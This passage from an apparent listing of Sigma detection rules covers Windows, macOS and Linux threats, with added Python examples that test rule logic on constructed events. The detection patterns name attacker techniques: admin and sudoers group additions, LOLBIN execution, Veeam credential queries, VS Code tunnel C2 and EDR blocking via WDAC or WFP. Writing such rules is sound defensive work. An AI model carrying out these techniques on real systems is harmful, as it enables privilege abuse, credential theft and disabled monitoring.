- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)
- https://twitter.com/frack113/status/1555830623633375232
author: frack113, Nasreddine Bencherchali
date: 2022-08-07
modified: 2025-10-22
tags:
- attack.stealth
- attack.t1564.004
- detection.threat-hunting
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '~1\'
- '~2\'
filter_main_system_process:
ParentImage:
- 'C:\Windows\System32\Dism.exe'
- 'C:\Windows\System32\cleanmgr.exe'
filter_main_winget:
- ParentImage|endswith: '\winget.exe'
- ParentImage|contains: '\AppData\Local\Temp\WinGet\'
filter_main_csc:
ParentImage|startswith: 'C:\Windows\Microsoft.NET\Framework64\v'
ParentImage|endswith: '\csc.exe'
filter_main_installers:
- Image|contains|all:
- '\AppData\'
- '\Temp\'
- CommandLine|contains: '\AppData\Local\Temp\' # sometimes installers spawn other installers from temp folder
filter_optional_dopus:
ParentImage: 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe'
filter_optional_aurora:
ParentImage|endswith:
- '\aurora-agent-64.exe'
- '\aurora-agent.exe'
filter_optional_thor:
ParentImage|endswith: '\thor\thor64.exe'
filter_optional_git:
CommandLine|contains:
- 'C:\Program Files\Git\post-install.bat'
- 'C:\Program Files\Git\cmd\scalar.exe'
filter_optional_webex:
- ParentImage|endswith: '\WebEx\webexhost.exe'
- CommandLine|contains: '\appdata\local\webex\webex64\meetings\wbxreport.exe'
filter_optional_veeam:
ParentImage|endswith: '\veeam.backup.shell.exe'
filter_optional_everything:
ParentImage|endswith: '\Everything\Everything.exe'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.
level: medium
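The rule above is a hunting rule rather than an alerting rule: its condition subtracts two groups of filters from the selection, and its false-positive note asks you to baseline short-name usage before trusting a hit. The following Python, added here as an illustration (it is not part of the Sigma project or of this page), evaluates that selection-minus-filters logic over a handful of constructed process_creation records and then ranks the surviving hits by how often their parent image spawns 8.3 command lines in the sample, rarest first. The events, paths and counts are all invented for the example.

```python
from collections import Counter

# Constructed process_creation events (not real telemetry). Field names follow the
# Sigma taxonomy the rule uses: Image, ParentImage, CommandLine.
EVENTS = [
    # installer spawning a child with a temp-folder short name -> filter_main_installers
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\PROGRA~1\post.bat"'},
    # DISM child -> filter_main_system_process
    {"Image": r"C:\Windows\System32\conhost.exe",
     "ParentImage": r"C:\Windows\System32\Dism.exe",
     "CommandLine": r"C:\Windows\System32\conhost.exe C:\Windows\TEMP\DISM~1\dism.log"},
    # no filter applies -> should alert
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"rundll32.exe C:\PROGRA~1\COMMON~1\upd.dll,Start"},
    # no filter applies -> should alert
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\bob\DOWNLO~1\pkg.msi /qn"},
    # Directory Opus child -> filter_optional_dopus
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\GPSoftware\Directory Opus\dopus.exe",
     "CommandLine": r"cmd.exe /c dir C:\PROGRA~2\*.exe"},
    # no short name at all -> not selected
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users"},
]


def selection(e):
    """selection: CommandLine contains '~1\\' or '~2\\' (Sigma matching is case-insensitive)."""
    cl = e["CommandLine"].lower()
    return "~1\\" in cl or "~2\\" in cl


def filter_main(e):
    """True when any one of the filter_main_* selections suppresses the event."""
    parent, image, cl = e["ParentImage"].lower(), e["Image"].lower(), e["CommandLine"].lower()
    return (
        parent in (r"c:\windows\system32\dism.exe", r"c:\windows\system32\cleanmgr.exe")
        or parent.endswith("\\winget.exe") or "\\appdata\\local\\temp\\winget\\" in parent
        or (parent.startswith(r"c:\windows\microsoft.net\framework64\v") and parent.endswith("\\csc.exe"))
        or ("\\appdata\\" in image and "\\temp\\" in image) or "\\appdata\\local\\temp\\" in cl
    )


def filter_optional(e):
    """True when any one of the filter_optional_* selections suppresses the event."""
    parent, cl = e["ParentImage"].lower(), e["CommandLine"].lower()
    return (
        parent == r"c:\program files\gpsoftware\directory opus\dopus.exe"
        or parent.endswith(("\\aurora-agent-64.exe", "\\aurora-agent.exe", "\\thor\\thor64.exe",
                            "\\webex\\webexhost.exe", "\\veeam.backup.shell.exe",
                            "\\everything\\everything.exe"))
        or r"c:\program files\git\post-install.bat" in cl or r"c:\program files\git\cmd\scalar.exe" in cl
        or r"\appdata\local\webex\webex64\meetings\wbxreport.exe" in cl
    )


def matches(e):
    """condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*"""
    return selection(e) and not filter_main(e) and not filter_optional(e)


def hunt(events):
    """Return rule hits as (ParentImage, baseline_count, CommandLine), rarest parent first.

    baseline_count is how often that parent spawned a short-name command line anywhere in
    the sample, filtered or not: the baseline the rule's false-positive note asks for.
    """
    baseline = Counter(e["ParentImage"].lower() for e in events if selection(e))
    hits = [(e["ParentImage"].lower(), baseline[e["ParentImage"].lower()], e["CommandLine"])
            for e in events if matches(e)]
    return sorted(hits, key=lambda h: h[1])


if __name__ == "__main__":
    for parent, count, cmd in hunt(EVENTS):
        print(f"{count:3d}  {parent}  ->  {cmd}")
```

Only the rundll32 and msiexec events survive; the explorer.exe parent sorts first because it is the rarer spawner of 8.3 paths in this sample. In production the baseline counter should be built over days of data, not the same batch being triaged.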
medium
Moderate
Medium FP
Use of Pcalua For Execution
Detects execution of commands and binaries from the context of the Program Compatibility Assistant (pcalua.exe). This can be used as a LOLBIN to bypass application whitelisting.
title: Use of Pcalua For Execution
id: 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2
related:
- id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
type: obsolete
status: test
description: Detects execution of commands and binaries from the context of the Program Compatibility Assistant (pcalua.exe). This can be used as a LOLBIN to bypass application whitelisting.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Pcalua/
- https://pentestlab.blog/2020/07/06/indirect-command-execution/
author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
date: 2022-06-14
modified: 2023-01-04
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\pcalua.exe'
CommandLine|contains: ' -a' # No trailing space after the flag because pcalua accepts any argument as long as a "-a" is present
condition: selection
falsepositives:
- Legitimate use via a batch script or by an administrator.
level: medium
medium
Moderate
High FP
User Added To Admin Group Via Dscl
Detects attempts to create and add an account to the admin group via "dscl"
title: User Added To Admin Group Via Dscl
id: b743623c-2776-40e0-87b1-682b975d0ca5
related:
- id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b
type: obsolete
status: test
description: Detects attempts to create and add an account to the admin group via "dscl"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos
- https://ss64.com/osx/dscl.html
author: Sohan G (D4rkCiph3r)
date: 2023-03-19
tags:
- attack.persistence
- attack.initial-access
- attack.privilege-escalation
- attack.stealth
- attack.t1078.003
logsource:
category: process_creation
product: macos
detection:
selection: # adds to admin group
Image|endswith: '/dscl'
CommandLine|contains|all:
- ' -append '
- ' /Groups/admin '
- ' GroupMembership '
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
medium
Moderate
High FP
User Added To Admin Group Via DseditGroup
Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
title: User Added To Admin Group Via DseditGroup
id: 5d0fdb62-f225-42fb-8402-3dfe64da468a
status: test
description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos
- https://ss64.com/osx/dseditgroup.html
author: Sohan G (D4rkCiph3r)
date: 2023-08-22
tags:
- attack.persistence
- attack.initial-access
- attack.privilege-escalation
- attack.stealth
- attack.t1078.003
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/dseditgroup'
CommandLine|contains|all:
- ' -o edit ' # edit operation
- ' -a ' # username
- ' -t user'
- 'admin' # Group name
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
medium
Moderate
High FP
User Added To Admin Group Via Sysadminctl
Detects attempts to create and add an account to the admin group via "sysadminctl"
title: User Added To Admin Group Via Sysadminctl
id: 652c098d-dc11-4ba6-8566-c20e89042f2b
related:
- id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b
type: obsolete
status: test
description: Detects attempts to create and add an account to the admin group via "sysadminctl"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos
- https://ss64.com/osx/sysadminctl.html
author: Sohan G (D4rkCiph3r)
date: 2023-03-19
tags:
- attack.persistence
- attack.initial-access
- attack.privilege-escalation
- attack.stealth
- attack.t1078.003
logsource:
category: process_creation
product: macos
detection:
selection:
# Creates and adds new user to admin group
Image|endswith: '/sysadminctl'
CommandLine|contains|all:
- ' -addUser '
- ' -admin '
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
medium
Moderate
Medium FP
User Added To Root/Sudoers Group Using Usermod
Detects usage of the "usermod" binary to add users to the root or sudoers groups
title: User Added To Root/Sudoers Group Using Usermod
id: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73
status: test
description: Detects usage of the "usermod" binary to add users to the root or sudoers groups
references:
- https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/
- https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/
author: TuanLe (GTSC)
date: 2022-12-21
tags:
- attack.privilege-escalation
- attack.persistence
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/usermod'
CommandLine|contains:
- '-aG root'
- '-aG sudoers'
condition: selection
falsepositives:
- Legitimate administrator activities
level: medium
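The rule above keys on the literal strings `-aG root` and `-aG sudoers`, so `usermod -a -G sudo bob` or `usermod --append --groups wheel bob` never fires even though both grant the same privilege. The Python below is an added example, not code from the Sigma project or this page: it parses the usermod command line the way getopt does (separate, glued and long-option spellings) and compares the result with the rule's substring test over constructed command lines. Treating `sudo` and `wheel` as privileged groups is an assumption about Debian/Ubuntu and RHEL-family defaults; adjust the set to your own fleet.

```python
import shlex

# Groups the rule above names, plus the real sudo groups on common distributions
# (assumption: "sudo" on Debian/Ubuntu, "wheel" on RHEL-family; tune to your fleet).
PRIVILEGED_GROUPS = {"root", "sudoers", "sudo", "wheel"}


def rule_substring(cmdline):
    """The rule as written: a plain substring test on the command line."""
    return "-aG root" in cmdline or "-aG sudoers" in cmdline


def usermod_groups(cmdline):
    """Return the groups a usermod command line assigns via -G/--groups (supplementary)
    or -g/--gid (primary), honouring getopt rules: separate flags (-a -G x), glued
    flags (-aG x), glued values (-Gx) and long options (--groups=x)."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: let the caller see an empty result
        return set()
    if not argv or not argv[0].endswith("usermod"):
        return set()
    groups, i = set(), 1
    while i < len(argv):
        tok = argv[i]
        if tok in ("-G", "--groups", "-g", "--gid"):
            if i + 1 < len(argv):
                groups.update(argv[i + 1].split(","))
                i += 1
        elif tok.startswith(("--groups=", "--gid=")):
            groups.update(tok.split("=", 1)[1].split(","))
        elif tok.startswith("-") and not tok.startswith("--"):
            # short-option cluster: the first option that takes a value consumes the
            # rest of the token, or the next token when nothing is glued on
            for pos, ch in enumerate(tok[1:], start=1):
                if ch in "Gg":
                    rest = tok[pos + 1:]
                    if rest:
                        groups.update(rest.split(","))
                    elif i + 1 < len(argv):
                        groups.update(argv[i + 1].split(","))
                        i += 1
                    break
                if ch in "cdeflpsuvwRZ":   # other usermod options that take a value
                    break
        i += 1
    return {g for g in groups if g}


def privileged_group_assigned(cmdline):
    """Hardened check: any privileged group, whichever usermod spelling was used."""
    return bool(usermod_groups(cmdline) & PRIVILEGED_GROUPS)


# Constructed command lines: (cmdline, rule_substring fires, hardened check fires)
SAMPLES = [
    ("usermod -aG root bob", True, True),
    ("usermod -a -G sudo bob", False, True),
    ("/usr/sbin/usermod --append --groups wheel,docker bob", False, True),
    ("usermod -g wheel bob", False, True),
    ("usermod -aG audio,video bob", False, False),
    ("usermod -c 'G root' bob", False, False),   # a comment value is not a group
]


def check_samples(samples=SAMPLES):
    """Return the samples whose outcome differs from expectation (empty when all agree)."""
    return [c for c, sub, hard in samples
            if rule_substring(c) != sub or privileged_group_assigned(c) != hard]


if __name__ == "__main__":
    for c, _, _ in SAMPLES:
        print(f"rule={rule_substring(c)!s:5} hardened={privileged_group_assigned(c)!s:5}  {c}")
```

The hardened check still misses `gpasswd -a bob sudo` and direct edits of /etc/group; it narrows one gap rather than replacing the rule.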
medium
Moderate
High FP
User Added to Local Administrators Group
Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
title: User Added to Local Administrators Group
id: ad720b90-25ad-43ff-9b5e-5c841facc8e5
related:
- id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups
type: similar
- id: 10fb649c-3600-4d37-b1e6-56ea90bb7e09 # Privileged groups
type: similar
status: test
description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
references:
- https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-12
modified: 2023-03-02
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098
logsource:
category: process_creation
product: windows
detection:
selection_main:
- CommandLine|contains|all:
# net.exe
- 'localgroup '
- ' /add'
- CommandLine|contains|all:
# powershell.exe
- 'Add-LocalGroupMember '
- ' -Group '
selection_group:
CommandLine|contains:
- ' administrators '
- ' administrateur' # Typo without an 'S' so we catch both
condition: all of selection_*
falsepositives:
- Administrative activity
level: medium
medium
Moderate
High FP
User Has Been Deleted Via Userdel
Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks.
title: User Has Been Deleted Via Userdel
id: 08f26069-6f80-474b-8d1f-d971c6fedea0
status: test
description: Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks.
references:
- https://linuxize.com/post/how-to-delete-group-in-linux/
- https://www.cyberciti.biz/faq/linux-remove-user-command/
- https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/
- https://linux.die.net/man/8/userdel
author: Tuan Le (NCSGroup)
date: 2022-12-26
tags:
- attack.impact
- attack.t1531
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/userdel'
condition: selection
falsepositives:
- Legitimate administrator activities
level: medium
medium
Moderate
High FP
UtilityFunctions.ps1 Proxy Dll
Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
title: UtilityFunctions.ps1 Proxy Dll
id: 0403d67d-6227-4ea8-8145-4e72db7da120
status: test
description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
references:
- https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/
author: frack113
date: 2022-05-28
tags:
- attack.stealth
- attack.t1216
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'UtilityFunctions.ps1'
- 'RegSnapin '
condition: selection
falsepositives:
- Unknown
level: medium
medium
Strong
Medium FP
VHD Image Download Via Browser
Detects creation of ".vhd"/".vhdx" files by browser processes.
Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
title: VHD Image Download Via Browser
id: 8468111a-ef07-4654-903b-b863a80bbc95
status: test
description: |
Detects creation of ".vhd"/".vhdx" files by browser processes.
Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
references:
- https://redcanary.com/blog/intelligence-insights-october-2021/
- https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
date: 2021-10-25
modified: 2023-05-05
tags:
- attack.resource-development
- attack.t1587.001
logsource:
category: file_event
product: windows
detection:
selection:
Image|endswith:
- '\brave.exe'
- '\chrome.exe'
- '\firefox.exe'
- '\iexplore.exe'
- '\maxthon.exe'
- '\MicrosoftEdge.exe'
- '\msedge.exe'
- '\msedgewebview2.exe'
- '\opera.exe'
- '\safari.exe'
- '\seamonkey.exe'
- '\vivaldi.exe'
- '\whale.exe'
# We don't use "endswith" to also match with ADS logs and ".vhdx". Example: "TargetFilename: C:\Users\xxx\Downloads\windows.vhd:Zone.Identifier"
TargetFilename|contains: '.vhd'
condition: selection
falsepositives:
- Legitimate downloads of ".vhd" files would also trigger this
level: medium
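Because the rule uses `contains '.vhd'` rather than `endswith`, one download produces two hits, the file itself and its `:Zone.Identifier` stream, and a path such as `notes.vhdstuff\readme.txt` also matches. The Python below is an added example, not code from the Sigma project or this page: it tightens the extension match, collapses the file and ADS events into one alert per VHD, and reads the download's origin from the Mark-of-the-Web stream. The events and the stream text are constructed; on a live host the stream is read from the endpoint (for instance with `Get-Content -Stream Zone.Identifier`), which the file_event record itself does not contain.

```python
import re

# Browser image names from the rule, lower-cased for case-insensitive comparison
BROWSERS = {"brave.exe", "chrome.exe", "firefox.exe", "iexplore.exe", "maxthon.exe",
            "microsoftedge.exe", "msedge.exe", "msedgewebview2.exe", "opera.exe",
            "safari.exe", "seamonkey.exe", "vivaldi.exe", "whale.exe"}

# Tighter than the rule's `contains '.vhd'`: the extension must end the path or be
# followed by an alternate data stream name, so "x.vhdstuff\readme.txt" does not match.
VHD_RE = re.compile(r"\.vhdx?(?::|$)", re.IGNORECASE)
# "<drive>:<path>[:<stream>]" -> separates a file path from an ADS name such as Zone.Identifier
ADS_RE = re.compile(r"^([A-Za-z]:[^:]*)(?::([^:]+))?$")


def is_vhd_target(path):
    return bool(VHD_RE.search(path))


def split_ads(path):
    m = ADS_RE.match(path)
    return (m.group(1), m.group(2)) if m else (path, None)


def parse_zone_identifier(text):
    """Parse the INI-style Zone.Identifier stream (Mark-of-the-Web) into a dict."""
    fields, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[zonetransfer]"
        elif in_section and "=" in line:
            k, v = line.split("=", 1)
            fields[k.strip()] = v.strip()
    return fields


def enrich(file_events, ads_streams):
    """Collapse the rule's file + ADS hits to one alert per VHD, enriched with MOTW data.

    ads_streams maps a file path to the text of its Zone.Identifier stream, as read
    from the endpoint after the alert fires."""
    alerts = {}
    for e in file_events:
        if e["Image"].rsplit("\\", 1)[-1].lower() not in BROWSERS:
            continue
        if not is_vhd_target(e["TargetFilename"]):
            continue
        base, stream = split_ads(e["TargetFilename"])
        alert = alerts.setdefault(base, {"Image": e["Image"], "ZoneId": None,
                                         "HostUrl": None, "ReferrerUrl": None})
        if stream and stream.lower() == "zone.identifier":
            motw = parse_zone_identifier(ads_streams.get(base, ""))
            for key in ("ZoneId", "HostUrl", "ReferrerUrl"):
                alert[key] = motw.get(key)
    return alerts


# Constructed file_event records and one constructed Zone.Identifier stream
FILE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\invoice.vhd"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\invoice.vhd:Zone.Identifier"},
    {"Image": r"C:\Windows\System32\svchost.exe",               # not a browser
     "TargetFilename": r"C:\Windows\Temp\backup.vhdx"},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",  # '.vhd' substring only
     "TargetFilename": r"C:\Users\bob\Downloads\notes.vhdstuff\readme.txt"},
]
ZONE_STREAMS = {
    r"C:\Users\alice\Downloads\invoice.vhd":
        "[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://mail.example.test/inbox\r\n"
        "HostUrl=https://cdn.example.test/dl/invoice.vhd\r\n",
}

if __name__ == "__main__":
    for path, info in enrich(FILE_EVENTS, ZONE_STREAMS).items():
        print(path, info)
```

`ZoneId=3` (Internet zone) plus the HostUrl turns a generic "browser wrote a VHD" hit into something a responder can act on: block the host, pull the file, and search proxy logs for the referrer.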
medium
Moderate
Medium FP
Veeam Backup Database Suspicious Query
Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
title: Veeam Backup Database Suspicious Query
id: 696bfb54-227e-4602-ac5b-30d9d2053312
status: test
description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
references:
- https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-04
tags:
- attack.collection
- attack.t1005
logsource:
category: process_creation
product: windows
detection:
selection_sql:
Image|endswith: '\sqlcmd.exe'
CommandLine|contains|all:
- 'VeeamBackup'
- 'From '
selection_db:
CommandLine|contains:
- 'BackupRepositories'
- 'Backups'
- 'Credentials'
- 'HostCreds'
- 'SmbFileShares'
- 'Ssh_creds'
- 'VSphereInfo'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
medium
Moderate
High FP
Visual Studio Code Tunnel Remote File Creation
Detects the creation of files by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via the VsCode tunnel feature.
title: Visual Studio Code Tunnel Remote File Creation
id: 56e05d41-ce99-4ecd-912d-93f019ee0b71
status: test
description: |
Detects the creation of files by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via the VsCode tunnel feature.
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
tags:
- attack.command-and-control
logsource:
category: file_event
product: windows
detection:
selection:
Image|contains: '\servers\Stable-'
Image|endswith: '\server\node.exe'
TargetFilename|contains: '\.vscode-server\data\User\History\'
condition: selection
falsepositives:
- Unknown
level: medium
medium
Moderate
High FP
Visual Studio Code Tunnel Service Installation
Detects the installation of VsCode tunnel (code-tunnel) as a service.
title: Visual Studio Code Tunnel Service Installation
id: 30bf1789-379d-4fdc-900f-55cd0a90a801
status: test
description: Detects the installation of VsCode tunnel (code-tunnel) as a service.
references:
- https://ipfyx.fr/post/visual-studio-code-tunnel/
- https://badoption.eu/blog/2023/01/31/code_c2.html
- https://code.visualstudio.com/docs/remote/tunnels
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'tunnel '
- 'service'
- 'internal-run'
- 'tunnel-service.log'
condition: selection
falsepositives:
- Legitimate installation of code-tunnel as a service
level: medium
medium
Strong
Medium FP
Visual Studio Code Tunnel Shell Execution
Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
title: Visual Studio Code Tunnel Shell Execution
id: f4a623c2-4ef5-4c33-b811-0642f702c9f1
status: test
description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
references:
- https://ipfyx.fr/post/visual-studio-code-tunnel/
- https://badoption.eu/blog/2023/01/31/code_c2.html
- https://code.visualstudio.com/docs/remote/tunnels
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|contains: '\servers\Stable-'
ParentImage|endswith: '\server\node.exe'
ParentCommandLine|contains: '.vscode-server' # Technically one can self-host the server instead of using the VsCode one, which would probably change this name (requires further research)
# Note: Child processes (ie: shells) can be whatever technically (with some efforts)
selection_child_1:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains: '\terminal\browser\media\shellIntegration.ps1'
selection_child_2:
Image|endswith:
- '\wsl.exe'
- '\bash.exe'
condition: selection_parent and 1 of selection_child_*
falsepositives:
- Legitimate use of Visual Studio Code tunnel and running code from there
level: medium
medium
Moderate
High FP
Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
id: a20391f8-76fb-437b-abc0-dba2df1952c6
related:
- id: 65c3ca2c-525f-4ced-968e-246a713d164f
type: similar
status: test
description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
references:
- https://twitter.com/mrd0x/status/1463526834918854661
- https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-01-11
modified: 2023-04-11
tags:
- attack.execution
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\Microsoft.NodejsTools.PressAnyKey.exe'
condition: selection
falsepositives:
- Legitimate use by developers as part of NodeJS development with Visual Studio Tools
level: medium
medium
Moderate
High FP
VsCode Code Tunnel Execution File Indicator
Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel.
title: VsCode Code Tunnel Execution File Indicator
id: 9661ec9d-4439-4a7a-abed-d9be4ca43b6d
status: test
description: |
Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel.
references:
- https://ipfyx.fr/post/visual-studio-code-tunnel/
- https://badoption.eu/blog/2023/01/31/code_c2.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
tags:
- attack.command-and-control
- detection.threat-hunting
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith: '\code_tunnel.json'
condition: selection
falsepositives:
- Legitimate usage of VsCode tunneling functionality will also trigger this
level: medium
medium
Moderate
High FP
VsCode Powershell Profile Modification
Detects the creation or modification of a VsCode related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence.
title: VsCode Powershell Profile Modification
id: 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502
related:
- id: b5b78988-486d-4a80-b991-930eff3ff8bf
type: similar
status: test
description: Detects the creation or modification of a VsCode related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence.
references:
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-24
modified: 2023-01-06
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1546.013
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith: '\Microsoft.VSCode_profile.ps1'
condition: selection
falsepositives:
- Legitimate use of the profile by developers or administrators
level: medium
medium
Moderate
Medium FP
WDAC Policy File Creation In CodeIntegrity Folder
Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
title: WDAC Policy File Creation In CodeIntegrity Folder
id: 121b25f7-b9d6-4b37-afa0-cba317ec52f3
status: experimental
description: |
Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
references:
- https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/
- https://www.virustotal.com/gui/file/d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97
author: Andreas Braathen (mnemonic.io)
date: 2025-01-30
tags:
- attack.defense-impairment
- attack.t1685
- detection.threat-hunting
logsource:
category: file_event
product: windows
definition: 'Requirements: By default the file_event log source might not contain the IntegrityLevel of the Process. It should be collected in order to use this rule'
detection:
selection:
TargetFilename|contains: ':\Windows\System32\CodeIntegrity\'
TargetFilename|endswith:
- '.cip'
- '.p7b'
IntegrityLevel: 'High'
condition: selection
falsepositives:
- May occur legitimately as part of admin activity, but rarely with interactive elevation.
level: medium
medium
Moderate
Medium FP
WFP Filter Added via Registry
Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
title: WFP Filter Added via Registry
id: 1f1d8209-636e-4c6c-a137-781cca8b82f9
status: experimental
description: |
Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
references:
- https://github.com/netero1010/EDRSilencer/blob/0e73a7037ec65c52894d8208e6f605a7da0a34a6/EDRSilencer.c
- https://www.huntress.com/blog/silencing-the-edr-silencers
- https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html
author: Frack113
date: 2025-10-23
tags:
- attack.execution
- attack.defense-impairment
- attack.t1685
- attack.t1569.002
logsource:
category: registry_set
product: windows
detection:
